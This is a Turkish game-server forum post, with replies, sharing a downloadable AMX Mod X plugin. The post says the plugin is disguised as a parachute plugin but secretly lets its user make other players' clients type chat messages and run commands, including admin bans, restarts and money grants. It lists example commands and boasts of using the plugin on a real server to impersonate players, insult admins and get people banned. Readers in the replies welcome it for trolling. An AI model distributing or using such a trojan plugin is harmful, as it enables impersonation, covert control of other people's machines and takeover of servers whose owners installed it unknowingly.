Reklam gösterimini engelleyici yazılım kullandığınızı görüyoruz.
Sitemizin ayakta kalıp sizlere hizmet edebilmek için en büyük gelir kaynağı sayfamızda gösterilen reklamlardır.
Reklam gösterimde bizim sayfamıza ayrıcalık tanıyarak ayakta kalmamıza destek olmak ister misiniz ?

Başka Oyuncuyu Kontrol Etme [Hileli Eklenti]

Konu

HAKKINDA

Plugin Adı: Başka Oyuncunun Adına/Ağzından Yazma
Plugin Versiyon: Yok
Plugin Yapımcısı: O da Yok

Anlatım Tamamen Bana Aittir. Tamamından veya Bir Kısmından Alıntı Yapılmasına İzin Vermiyorum.

AÇIKLAMA

Eveeeet, Plugin Paylaşımlarıma Son Sürat Devam Ederken Elim Birden Bakın Neye Çarptı. Paraşüt Plugini Gibi Görünüp Hatta Paraşüt Pluginiyle Birleştirilebilen Bildiğiniz Hile Plugini. Şimdi Bunu Server Sahibi Sunucusuna Niye Kursun Manyak mı Diyeceksiniz. Başkalarının Ağzından Konuşmayı Trollemeyi Seven Biriyse (Benim Gibi) Neden Kurmasın. 
Şaka Bir Yana, Bu Plugin Birçok Pluginin İçine Rahatlıkla Yerleştirilebildiğinden ve Kod Yapısı Başka Pluginlere Uyarlanabildiğinden, Kendini Rahatlıkla Kamufle Edebiliyor. Gözünüze Çok Uzak Geliyorsa Okumaya Devam Edin.
Yaklaşık 1 - 1 Buçuk Ay Önce Elime Bir Plugin Geldi. Ne Olduğunu Sorduğumda, Leaperların Paraşüt Açınca Zıplamasını Bozmayan Cvarsız Paraşüt Denildi. Bende Kod Yapısını Bir Göz Gezdirip Sunucuma Kurdum. Hakikaten Düzelme Oldu. Ama Sunucudaki Oyuncular Saçma Sapan Konuşmaya Başladı, Ardından Kendilerinin Yazmadıklarını İfade Ettiler. Şakacı Arkadaşlarım Durumu 10 Gün Sonra Anlattılar Bana, Ben de Yapmaya Başladım  Gülmekten Ölüyorum
Derken Last # OttoMan Sunucusuna Girdik. Last Ottoman'ın Gerçek Ustası Aiakos'un Pluginleri Her Zamanki Gibi Ateş Ediyordu. Sonra Bu Şakacı Arkadaşlarımın Burada da Aynı Şeyi Yapmaya Başladıklarını Farkettim. Ben de Yapmaya Başladım. Allah Affetsin Oyuncuların Ağzından Adminlere Küfür Edip Milleti Banlatıyorduk. En Son Adam Kalmadı Adminleri Birbirine Düşürmemizle Ban Yememiz Bir Oldu. by Casmenciğim Çok Kızmamıştır Umarım Gülmekten Ölüyorum

Komutlar:
Kod:
amx_showparachute <nick> <komut>

Örnek 1: amx_showparachute yigit say "Hepinizi Siraya Dizerim"                   // Yigit:Hepinizi Siraya Dizerim
Örnek 2: amx_showparachute omer kill                                             // Omer Kill Cekti
Örnek 3: amx_showparachute casmen "amx_cvar sv_restart 1"                        // ADMIN: Casmen Sv_restart 1 Komutunu Girdi
Örnek 4: amx_showparachute casmen say "Sunucuyu Bu Hale Getiren Aiakos'dur Ben Bir Ise Yaramam :D"
Örnek 5: amx_showparachute mercy "amx_banmenu;wait;slot1;wait;slot2;wait;slot3"  // ADMIN: Mercy Banmenuden 3 Kisiyi Banladi.
Örnek 6: amx_showparachute samet "amx_givemoney yigit 9999999"                   // ADMIN: Samet Yigit'e 999999$ Verdi
Örnek 7: amx_showparachute player +left;+dellaser                                // Player Sürekli Sola Dönüyor, Lazer Bugundan Kıpırdayamıyor.

Evet Arkadaşlar Bu Kadar Eşşek Şakasının Üstüne Last # OttoMan Klanı Durumu Farkederek Açığı Kapattı.
En Son Oyuncuların Yerine Oynamaya Baslamistik. Adamlar Klavyelerini Farelerini Bırakıp Onları Yönetmemizi İzliyordu.
Kendimize Hız Verip Tuşa Bindliyorduk. Sunucudaki Yüklü Eklentilerin İsimlerini Alıyorduk. amx_addadmin ve amx_cvar rcon_password Komutları Engelli Olmasaydı Sunucuyu Kısa Süreliğine Ele Geçirebilirdik  Gülmekten Ölüyorum 

Rar Şifresi
hileli_plugin.csailesi.com

.zip Hileli_Plugin.zip (Dosya Boyutu: 1.23 KB | İndirme Sayısı: 44)

Yaşlanarak Değil Yaşayarak Tecrübe Kazanılır, Zaman İnsanları Değil Armutları Olgunlaştırır.
-Peyami Safa

(10-06-2017, Saat: 23:49)Swindler Adlı Kullanıcıdan Alıntı: BU guzelmis Gülmekten Ölüyorum piclik yapilir .
Gülmekten Ölüyorum Gülmekten Ölüyorum Gülmekten Ölüyorum

Yaşlanarak Değil Yaşayarak Tecrübe Kazanılır, Zaman İnsanları Değil Armutları Olgunlaştırır.
-Peyami Safa

Teşekkürler

Varya Tam Boyle Bişi Lazımdı Banada Fena Milleti Trollucem Gülmekten Ölüyorum

Kod:
STH Gaming COMMUNITY Match System
Server ip : cs6.csduragi.net / 213.238.173.206 / cs1.sthgaming.org
16v16 Mac Server ip : cs155.csduragi.com / cs2.sthgaming.org
Team Speak3 ip : ts26.csduragi.com
Web Adresi : www.sthgaming.org

Yararlı, Konu İçin Teşekkürler

Bir hesap oluşturun veya yorum yapmak için giriş yapın

Yorum yapmak için üye olmanız gerekiyor

ya da

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
[REAPI] AFK Kontrol PawNod' 19 819 13-09-2023, Saat: 14:02
Son Yorum: Hüseyin [YMK]
Nick Kontrol v2 emirakpinar 24 2,068 13-09-2023, Saat: 14:01
WebDiyo.COM   | Sol Alt Köşe'de HP-ARMOR'u Gösteren Eklenti Aconyonn 41 2,071 10-09-2023, Saat: 17:57
Genel   | AIM Kontrol Eklentisi / Hile Test / Hile Engelleme MawiLarq 61 4,998 01-01-2021, Saat: 20:05
Son Yorum: kekems
WebDiyo.COM   | TeamViewer Kontrol Eklentisi Aconyonn 20 771 13-09-2020, Saat: 19:44
Son Yorum: neixxx

Task